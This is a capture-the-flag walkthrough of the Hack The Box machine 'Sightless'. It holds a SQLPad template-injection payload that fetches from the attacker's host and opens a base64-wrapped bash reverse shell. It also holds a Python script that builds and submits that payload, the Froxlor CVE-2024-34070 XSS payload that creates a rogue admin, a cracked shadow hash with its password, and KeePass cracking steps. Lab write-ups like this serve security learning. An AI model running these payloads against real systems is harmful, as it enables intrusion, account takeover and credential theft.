[HTB] Sightless

OS: Linux
Difficulty: Easy
Author: EmSec
Release Date: September 7, 2024


Recon

Nmap

nmap -T4 -A -p- 10.10.11.32 -o initial_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 13:38 WEST
Nmap scan report for 10.10.11.32
Host is up (0.041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/13%Time=66E43281%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20
SF:try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x
SF:20being\x20more\x20creative\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/13%OT=21%CT=1%CU=31944%PV=Y%DS=2%DC=T%G=Y%TM=66E4
OS:32C4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 41.34 ms 10.10.14.1
2 41.43 ms 10.10.11.32

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.89 seconds

Port  Service
21    FTP
22    SSH
80    HTTP

HTTP Page

Port 80 redirects to http://sightless.htb/, so add sightless.htb to /etc/hosts first. The site advertises a SQLPad instance at sqlpad.sightless.htb.

Add sqlpad.sightless.htb to /etc/hosts as well and open it in the browser.

FootHold

SQLPAD Template Injection RCE

A quick search turns up a known template injection RCE in SQLPad: the Database field of a connection is rendered server-side as a template, so a {{ }} expression is evaluated inside the Node.js process.

To confirm code execution, create a new connection and make the target call back to our machine.
Click Add connection, select MySQL as the Driver, and put the following payload in the Database field (replace <IP> with your own address).

{{ process.mainModule.require('child_process').exec('wget http://<IP>:1234/pwn') }}

Start an HTTP server on your machine to receive the callback:

python3 -m http.server 1234

Clicking Test on the connection triggers the template, and the wget request shows up in the http.server log, confirming RCE.

Reverse Shell

To get a first reverse shell, swap the wget command for a reverse shell one-liner. I had problems using a normal reverse shell, so I had to encode it in base64 first.

Add a new connection, select MySQL as the Driver again, and put the following payload in the Database field.

{{ process.mainModule.require('child_process').exec('echo "<base64 revshell>" | base64 -d | bash') }}

Start a listener on your machine:

nc -lvnp 1337

If we test the connection now, we pop a shell.
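Building the two SQLPad payloads by hand is error-prone because the command ends up inside exec('...') in a {{ }} expression, so quotes, ampersands and redirections in a reverse shell break it. The following helper (an added example, not code from the original writeup or from SQLPad) builds the bash reverse shell, base64-wraps it exactly as the payload above does, checks that the result is safe to embed, and optionally submits it as a connection. The /api/test-connection endpoint, the cookie-based session and the connection field names are assumptions taken from what the browser sends when you click Test; adjust them from Burp if they differ.

```python
import base64
import json
import urllib.request

# Template injection shape used on the page: the Database field of a SQLPad
# connection is rendered as a template, so this runs in the Node.js process.
TEMPLATE = "{{ process.mainModule.require('child_process').exec('%s') }}"


def build_revshell(lhost: str, lport: int) -> str:
    """Plain bash reverse shell one-liner (needs bash, not /bin/sh, to parse >&)."""
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def encode_command(cmd: str) -> str:
    """Wrap a command so that only base64 characters reach the template.

    exec('...') runs the string through /bin/sh, and the quotes, '&', '>' and '|'
    of a raw reverse shell are what usually breaks; base64 sidesteps all of it.
    """
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"echo {b64} | base64 -d | bash"


def decode_command(wrapped: str) -> str:
    """Inverse of encode_command, to double-check the payload before sending it."""
    b64 = wrapped.split()[1]
    return base64.b64decode(b64).decode()


def build_template(cmd: str) -> str:
    """Embed the command in the {{ }} expression; a single quote would close exec('."""
    if "'" in cmd or "\n" in cmd:
        raise ValueError("command must not contain single quotes or newlines")
    return TEMPLATE % cmd


def build_connection(database_value: str, name: str = "pwn") -> dict:
    """Connection object as the SQLPad UI submits it (field names are an assumption)."""
    return {
        "name": name,
        "driver": "mysql",
        "host": "127.0.0.1",
        "port": "3306",
        "username": "",
        "password": "",
        "database": database_value,
    }


def test_connection(base_url: str, connection: dict, cookie: str) -> int:
    """POST the connection to SQLPad's test endpoint; the template fires server-side.

    The /api/test-connection path and the session cookie are assumptions: copy
    them from the request the browser makes when you press Test in the UI.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/test-connection",
        data=json.dumps(connection).encode(),
        headers={"Content-Type": "application/json", "Cookie": cookie},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    import sys

    lhost, lport = sys.argv[1], int(sys.argv[2])
    payload = build_template(encode_command(build_revshell(lhost, lport)))
    # Paste this into the Database field, or hand build_connection(payload)
    # to test_connection() together with your session cookie.
    print(payload)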

Michael User

The shell runs as root, but a quick look around (hostname, /.dockerenv) shows we are inside a Docker container, not on the host.
Since we are root in the container, we can read /etc/shadow, which contains a hash for the michael user.

$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

Crack the hash with hashcat (mode 1800 is sha512crypt, the $6$ prefix):

hashcat -m 1800 michael.hash /usr/share/wordlists/rockyou.txt

We now have a user and password

User     Password
michael  insaneclownposse

The password is reused on the host, so we can log in through SSH with it.

ssh michael@sightless.htb

PrivEsc

Froxlor CVE-2024-34070

Looking at the listening ports on the machine, we find port 8080 bound to localhost only.

netstat -tnlp

Forward port 8080 over SSH. In my case I used local port 1234, since I use port 8080 for my Burp Suite proxy.

ssh -L 1234:127.0.0.1:8080 michael@sightless.htb

Visiting the forwarded port shows a Froxlor login page.

This Froxlor version is vulnerable to CVE-2024-34070, a stored XSS.
The loginname parameter of a failed login attempt is written to the system log without sanitisation, so an unauthenticated user can inject a script that executes when the administrator views the System Logs page. The public proof of concept uses that to make the admin's browser create a new admin account.

Steps to reproduce:

First, capture a login request in Burp Suite.

Then replace the loginname parameter with the payload from the public proof of concept (reproduced below).

Original Payload:

admin{{$emit.constructor`function+b(){var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3bvar+csrfToken%3dmetaTag.getAttribute('content')%3bvar+xhr%3dnew+XMLHttpRequest()%3bvar+url%3d"https%3a//demo.froxlor.org/admin_admins.php"%3bvar+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dyldrmtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3bxhr.open("POST",url,true)%3bxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3balert("Your+Froxlor+Application+has+been+completely+Hacked")%3bxhr.send(params)}%3ba%3db()`()}}

URL decode the payload and remove "https://demo.froxlor.org" from the url variable, so the request goes to the Froxlor instance the admin is actually logged into.
I also changed the username and password of the account it creates.

Paste the edited payload into the loginname parameter, URL encode it again, and send the request.

Once the administrator views the System Logs, the script runs in their browser and creates the new admin account, and we can log in with it.

web1 FTP

In the Traffic tab we find a user called "web1" with FTP traffic.

As admin we can edit that user's FTP account: click on the web1 user, then FTP > Accounts.

Change the FTP password of the account to one we know.

We can now log in to the FTP service with it.

lftp web1@10.10.11.32

Listing the current directory fails with a certificate validation error, because the server's TLS certificate is not trusted by lftp. Disable verification for this session with:

set ssl:verify-certificate false

KeePass Database

In the /goaccess/backup directory there is a file called Database.kdb.

This is a KeePass database. Download it and open it with kpcli:

kpcli --kdb=Database.kdb

It is protected by a master password.
Extract a crackable hash with keepass2john and run john against it with rockyou:

keepass2john Database.kdb > keepass.hash
john keepass.hash -w=/usr/share/wordlists/rockyou.txt --format=KeePass

There is an entry in the Database called ssh in /General/sighless.htb/Backup.

show -f ssh

This entry holds a password and an SSH private key as an attachment.
Export the attachment:

attach ssh

Trying the key against root over SSH fails: ssh rejects the key file.

chmod 600 id_rsa
ssh root@sightless.htb -i id_rsa

The exported key has Windows line endings and a stray space at the end, which is enough for ssh to refuse it. Run dos2unix on it, remove the trailing space, and use the key again.

dos2unix id_rsa
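The same clean-up, written out so it is clear what dos2unix and the manual edit actually change, as an added example that is not part of the original writeup. normalize_private_key() converts CRLF to LF, strips trailing whitespace from every line and makes the file end with exactly one newline; key_problems() lists the reasons ssh would reject a key-shaped file before the fix and returns an empty list after it. The sample key is constructed (a base64 body of dummy bytes, not a real key) and the checker assumes an unencrypted OpenSSH or PEM key without Proc-Type style header lines.

```python
import base64
import binascii
import re

BEGIN_RE = re.compile(r"^-----BEGIN [A-Z ]+PRIVATE KEY-----$")
END_RE = re.compile(r"^-----END [A-Z ]+PRIVATE KEY-----$")


def normalize_private_key(text: str) -> str:
    """What dos2unix plus 'strip trailing whitespace' does: CRLF -> LF, drop
    trailing spaces/tabs on every line, drop blank trailing lines, end with one LF."""
    unix = text.replace("\r\n", "\n").replace("\r", "\n")
    lines = [line.rstrip(" \t") for line in unix.split("\n")]
    while lines and lines[-1] == "":
        lines.pop()
    return "\n".join(lines) + "\n"


def key_problems(text: str) -> list:
    """Reasons ssh would refuse this file; an empty list means it looks well-formed."""
    problems = []
    if "\r" in text:
        problems.append("carriage returns (CRLF line endings)")
    if not text.endswith("\n"):
        problems.append("missing final newline")
    lines = text.split("\n")
    if lines and lines[-1] == "":
        lines = lines[:-1]  # the final newline is expected, not a problem
    if not lines or not BEGIN_RE.match(lines[0]):
        problems.append("first line is not exactly the BEGIN marker")
    if not lines or not END_RE.match(lines[-1]):
        problems.append("last line is not exactly the END marker")
    for n, line in enumerate(lines, 1):
        if line != line.rstrip():
            problems.append(f"line {n} has trailing whitespace")
    # Everything between the markers must be one contiguous base64 blob.
    body = "".join(lines[1:-1])
    try:
        base64.b64decode(body, validate=True)
    except (ValueError, binascii.Error):
        problems.append("body between the markers is not valid base64")
    return problems


def build_sample_key(broken: bool) -> str:
    """Constructed key-shaped file for testing: dummy bytes, not a real key.

    broken=True reproduces the exported file on the page: CRLF line endings and
    a trailing space after the END marker.
    """
    body = base64.b64encode(bytes(range(96))).decode()
    body_lines = [body[i:i + 70] for i in range(0, len(body), 70)]
    lines = ["-----BEGIN OPENSSH PRIVATE KEY-----"] + body_lines + ["-----END OPENSSH PRIVATE KEY-----"]
    if broken:
        return "\r\n".join(lines) + " \r\n"
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    import sys

    path = sys.argv[1]
    with open(path, newline="") as fh:  # newline="" keeps the \r so we can see it
        raw = fh.read()
    for problem in key_problems(raw):
        print("before:", problem)
    fixed = normalize_private_key(raw)
    with open(path, "w", newline="\n") as fh:
        fh.write(fixed)
    print("after:", key_problems(fixed) or "ok")
```

Run it as `python3 fixkey.py id_rsa`, then `chmod 600 id_rsa` and retry the ssh command; the chmod is still needed, because ssh also refuses keys that are readable by other users.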

Rooted :)